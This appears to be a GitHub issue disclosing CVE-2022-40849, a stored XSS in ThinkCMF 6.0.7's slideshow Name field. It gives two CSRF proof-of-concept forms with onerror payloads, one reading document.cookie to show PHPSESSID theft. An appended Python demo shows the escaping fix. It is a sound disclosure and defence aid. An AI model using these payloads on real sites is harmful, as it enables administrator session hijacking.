CVE-2022-40849: XSS Stored in the Slideshow Management component. · Issue #737 · thinkcmf/thinkcmf
ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a persistent XSS payload in the Slideshow Management section that executes arbitrary JavaScript code on the client side, e.g., to steal the administrator's PHP session token (PHPSESSID).
ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows HTML tags and JavaScript code to be inserted in the Name field.
Here are the steps to reproduce the issue.
Note that with this issue a remote user can steal the administrator’s session cookie (PHPSESSID).
These are the PoCs I used.
```html
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(0)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
```
```html
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(document.cookie)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
```
Fig. 1: CSRF that contains an XSS payload
Fig. 2: CSRF payload triggered
Fig. 3: XSS payload injected
Fig. 4: XSS triggered
Fig. 5: Reading the PHPSESSID cookie
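As an added illustration, not part of the original issue or of ThinkCMF's own code, the Python below renders a slide row the way the vulnerable page does (Name placed in HTML unescaped) and the way a fixed one should (contextual HTML escaping), using the Name payload from the PoC above. The render functions and the naive blocklist are hypothetical stand-ins written for this demonstration; they are not ThinkCMF's code.

```python
import html
import re
from html.parser import HTMLParser

# Payload taken from the PoC in this issue: slashes replace the spaces
# between tag name and attributes, so it contains no whitespace at all.
POC_NAME = "<audio/src/onerror=alert(document.cookie)>"


class TagCollector(HTMLParser):
    """Records every start tag and its attributes found in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def find_event_handlers(fragment):
    """Return (tag, attribute) pairs for every on* attribute a browser
    would see, i.e. script that runs once the fragment is rendered."""
    parser = TagCollector()
    parser.feed(fragment)
    return [(tag, attr) for tag, attrs in parser.tags
            for attr in attrs if attr.startswith("on")]


def naive_filter_blocks(name):
    """Hypothetical blocklist that only matches '<tag ' with whitespace
    after the tag name; the slash-separated payload is not matched, which
    is why filtering input is not a substitute for output encoding."""
    return re.search(r"<\s*\w+\s", name) is not None


def render_row_vulnerable(name, remark):
    # Mirrors the bug: the stored Name is interpolated into HTML as-is.
    return f"<tr><td>{name}</td><td>{remark}</td></tr>"


def render_row_hardened(name, remark):
    # Contextual output encoding: each value is HTML-escaped, quotes
    # included, so the browser renders text rather than markup.
    return (f"<tr><td>{html.escape(name, quote=True)}</td>"
            f"<td>{html.escape(remark, quote=True)}</td></tr>")
```

Stored values already in the database still need the same escaping at render time; escaping on input alone leaves existing rows exploitable.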